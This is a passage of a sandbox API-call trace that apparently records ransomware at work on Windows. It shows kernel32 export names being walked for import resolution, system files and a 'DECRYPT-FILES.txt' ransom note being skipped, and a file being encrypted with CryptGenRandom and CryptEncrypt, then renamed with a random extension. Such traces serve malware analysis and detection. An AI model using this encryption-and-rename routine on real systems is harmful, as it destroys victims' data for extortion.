lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.033] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.033] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.034] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.034] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.034] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.034] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.034] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.034] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.034] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.034] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.034] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.034] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.034] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.034] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.034] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.034] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.034] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.034] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.034] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.034] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.035] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.035] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.035] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.035] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.035] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.035] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.035] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.035] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.035] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.035] lstrlenA (lpString="DELETEATOM") returned 10 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.035] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.035] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.035] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.035] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.035] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.035] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.035] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.036] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.036] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.036] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.036] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.036] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.036] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.036] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.036] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.036] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.036] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.036] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.036] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.036] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.036] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.036] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.036] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.036] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.036] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.037] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.037] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.037] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.037] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.037] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.037] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.037] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.037] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.037] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.037] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.037] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.037] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.037] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.037] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.037] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.038] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.038] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\3fm.pps") returned 55 [0083.038] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\3fm.pps.YcP1lN") returned 62 [0083.038] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\3fm.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\3fm.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\3fm.pps.YcP1lN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\3fm.pps.ycp1ln"), dwFlags=0x0) returned 1 [0083.038] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.038] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.039] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.039] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadacbec0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xadacbec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadacbec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0083.039] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0083.039] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefeb1d0, ftCreationTime.dwHighDateTime=0x1d4c5a7, ftLastAccessTime.dwLowDateTime=0xa129b790, ftLastAccessTime.dwHighDateTime=0x1d4cfab, ftLastWriteTime.dwLowDateTime=0xa129b790, ftLastWriteTime.dwHighDateTime=0x1d4cfab, nFileSizeHigh=0x0, nFileSizeLow=0xeeab, dwReserved0=0x0, dwReserved1=0x0, cFileName="f3Xg9nYjQ-ZhfDQwlSU.wav", cAlternateFileName="F3XG9N~1.WAV")) returned 1 [0083.039] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav", lpString2="DECRYPT-FILES.txt") returned 1 [0083.039] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav", lpString2="autorun.inf") returned 1 [0083.039] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav", lpString2="boot.ini") returned 1 [0083.039] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav", lpString2="desktop.ini") returned 1 [0083.039] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav", lpString2="ntuser.dat") returned -1 [0083.039] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav", lpString2="iconcache.db") returned -1 [0083.039] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav", lpString2="bootsect.bak") returned 1 [0083.039] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav", lpString2="ntuser.dat.log") returned -1 [0083.039] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav", lpString2="thumbs.db") returned -1 [0083.039] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav", lpString2="Bootfont.bin") returned 1 [0083.039] lstrlenW (lpString="f3Xg9nYjQ-ZhfDQwlSU.wav") returned 23 [0083.039] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0083.039] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0083.039] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0083.039] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0083.039] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0083.039] lstrlenW (lpString="f3Xg9nYjQ-ZhfDQwlSU.wav") returned 23 [0083.039] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0083.040] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="f3Xg9nYjQ-ZhfDQwlSU.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\f3Xg9nYjQ-ZhfDQwlSU.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\f3Xg9nYjQ-ZhfDQwlSU.wav" [0083.040] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.040] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\f3Xg9nYjQ-ZhfDQwlSU.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\f3xg9nyjq-zhfdqwlsu.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0083.040] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=61099) returned 1 [0083.040] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0083.040] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.040] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.040] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.040] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.041] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0083.041] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.042] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.042] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.043] CloseHandle (hObject=0x444) returned 1 [0083.043] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.043] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0083.044] CloseHandle (hObject=0x0) returned 0 [0083.044] CloseHandle (hObject=0x440) returned 1 [0083.044] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.044] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.044] GetTickCount () returned 0x114d3b4 [0083.044] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.045] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.045] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.045] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.045] lstrlenA (lpString="kernel32.dll") returned 12 [0083.045] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.045] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.045] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.045] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.045] lstrlenA (lpString="ADDATOMA") returned 8 [0083.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.046] lstrlenA (lpString="ADDATOMW") returned 8 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.046] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.046] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.046] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.046] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.046] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.046] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.046] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.046] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: 